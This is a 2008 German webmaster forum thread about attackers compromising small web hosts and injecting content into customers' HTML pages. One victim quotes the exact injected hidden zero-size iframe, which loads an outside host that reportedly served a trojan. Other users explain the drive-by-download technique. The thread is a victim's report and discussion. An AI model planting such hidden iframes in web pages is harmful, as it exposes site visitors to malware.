Hackerangriff auf Hoster

Beitrag von **guppy** » 26.02.2008, 09:26

kleine hoster scheinen derzeit von hackern belagert zu werden.
Einer der Hoster wo ich eine Domain liegen habe, ist auch betroffen (limtec).
Der Angreifer fügt folgenden code auf den Webseiten ein:
<iframe src="https://lipitor.freehoxt.com/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

So richtig erschließt sich mir der Sinn des Ganzen nicht, aber dafür gibt es ja hier kluge Köpfe

.
Ach so , der Angreifer scheint nicht über den FTP zu kommen.

von **Anzeige von ABAKUS** »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Beitrag von **catcat** » 26.02.2008, 10:00

Hast Du ein Board oder CMS da?
Falls ja: Welches?

Beitrag von **guppy** » 26.02.2008, 10:07

nein - stinknormale html, scripte sind lediglich der cscounter und googlesitemap.
Ein telefonat mit dem hoster ergab dass es noch andere Seiten betrifft und ein befreubdeter webmaster berichtete das Gleiche von einem anderen hoster.
über shell ?

Beitrag von **catcat** » 26.02.2008, 10:09

Dannn wird wohl der Hoster seinen Apachen nicht korrekt eingerichtet zu haben...

Beitrag von **Pompom** » 26.02.2008, 10:19

Das ist der Grund, weshalb ich mich von kleinen Nieschenhostern fern halten, hinter denen oft nur 1...4 Frickelfrieds stehen.

Bei falsch gesetzten Nutzerrechten auf einem Server ist es kein Problem, über eine löchrige Applikation alle Kunden zu infizieren.

Auf dem Host https://lipitor.freehoxt.com/ siehst du nicht mehr das, wa Grund für den Hacker war, d.h. der Hoster freehoxt.com hat schon reagiert. Dort lagerte ursprünglich ein Torjaner, der deinen Usern untergeschoben werden sollte.

Beitrag von **auftragslinker** » 26.02.2008, 10:33

@pompom: selbst bei großen hostern gibt es immer einen weg, einen server zu kompromittieren.

Beitrag von **guppy** » 26.02.2008, 12:03

Pompom hat geschrieben:Dort lagerte ursprünglich ein Torjaner, der deinen Usern untergeschoben werden sollte.

#

?? ein Trojaner per iframe ?
so wie jetzt sah die Seite auch aus, als ich da die Abusemeldung mailte,
deshalb erschließt sich mir der Sinn ja nicht. Und der cache ist so eine Pillenseite.

Beitrag von **chris21** » 26.02.2008, 14:57

?? ein Trojaner per iframe ?

Inzwischen übliche Methode, um Trojaner zu verbreiten. Such mal nach "Drive-by-Downloads", da wird einem übel.

Beitrag von **seo-link** » 06.07.2008, 07:17

Es hat auch große Hoster getroffen!
Bei mir waren 2 HTML-Pages infiziert ... wie auch immer

Beitrag von **Boa** » 06.07.2008, 10:11

warftp und Antivir User sind gerne mal betroffen

Beitrag von **seo-link** » 06.07.2008, 10:13

Hab ich beides nicht am Laufen

Beitrag von **swiat** » 06.07.2008, 18:27

Boa hat geschrieben:warftp und Antivir User sind gerne mal betroffen

Warum gerade die?